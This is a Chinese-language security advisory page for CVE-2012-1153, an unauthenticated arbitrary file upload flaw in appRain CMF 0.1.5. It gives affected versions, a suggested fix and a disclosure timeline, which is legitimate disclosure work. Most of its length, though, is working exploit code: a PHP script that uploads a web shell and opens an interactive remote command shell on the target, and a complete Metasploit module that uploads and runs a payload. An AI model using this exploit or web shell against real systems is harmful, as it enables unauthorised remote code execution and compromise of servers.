appRain CMF 'uploadify.php'远程任意文件上传漏洞
appRain CMF 'uploadify.php'远程任意文件上传漏洞
发布日期:2012-01-19
更新日期:2012-10-16
受影响系统:
appRain appRain CMF 0.1.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51576
CVE ID: CVE-2012-1153
appRain CMF是开源内容管理框架。
appRain CMF 0.1.5及其他版本存在任意文件上传漏洞,成功利用后可允许攻击者上传任意文件到受影响服务器。
<*来源:EgiX (n0b0d13s@gmail.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
/*
---------------------------------------------------------------------
appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
---------------------------------------------------------------------
author............: Egidio Romano aka EgiX
mail..............: n0b0d13s[at]gmail[dot]com
software link.....: http://www.apprain.com/
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] vulnerable code in /webroot/addons/uploadify/uploadify.php
27. if (!empty($_FILES)) {
28. $tempFile = $_FILES['Filedata']['tmp_name'];
29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
30. $targetFile = "uploads/" . $_FILES['Filedata']['name'];
31.
32. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
33. // $fileTypes = str_replace(';','|',$fileTypes);
34. // $typesArray = split('\|',$fileTypes);
35. // $fileParts = pathinfo($_FILES['Filedata']['name']);
36.
37. // if (in_array($fileParts['extension'],$typesArray)) {
38. // Uncomment the following line if you want to make the directory if it doesn't exist
39. // mkdir(str_replace('//','/',$targetPath), 0755, true);
40.
41. move_uploaded_file($tempFile,$targetFile);
42. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
43. // } else {
44. // echo 'Invalid file type.';
45. // }
46. }
Restricted access to this script isn't properly realized, so an attacker might be able to upload
arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
[-] Possible bug fix:
include_once('../../../app.php');
App::__Obj('appRain_Base_Core')->check_admin_login();
add this lines of code at the beginning of the script
[-] Disclosure timeline:
[19/12/2011] - Vulnerability discovered
[19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135
[20/12/2011] - Vendor response and fix suggested
[16/01/2012] - After four weeks still no fix released
[19/01/2012] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------------------------+";
print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /apprain-v015/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\napprain-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in appRain's Content Management
Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a
malicious user can upload a file to the uploads/ directory without any
authentication, which results in arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2012-1153'],
['OSVDB', '78473'],
['EDB', '18392']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['appRain 0.1.5 or less', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jan 19 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
], self.class)
end
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploadify.php"
})
if res and res.code == 200 and res.body.empty?
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
post_data = "--o0oOo0o\r\n"
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
post_data << "<?php "
post_data << payload.encoded
post_data << " ?>\r\n"
post_data << "--o0oOo0o\r\n"
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}addons/uploadify/uploadify.php",
'ctype' => 'multipart/form-data; boundary=o0oOo0o',
'data' => post_data
})
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200 or res.body !~ /#{payload_name}/
print_error("#{peer} - I don't think the file was uploaded. Abort!")
return
end
print_status("#{peer} - Executing PHP payload (#{payload_name})")
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}"
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code != 200
print_status("#{peer} - Server returns #{res.code.to_s}")
end
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
appRain
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apprain.com/
评论暂时关闭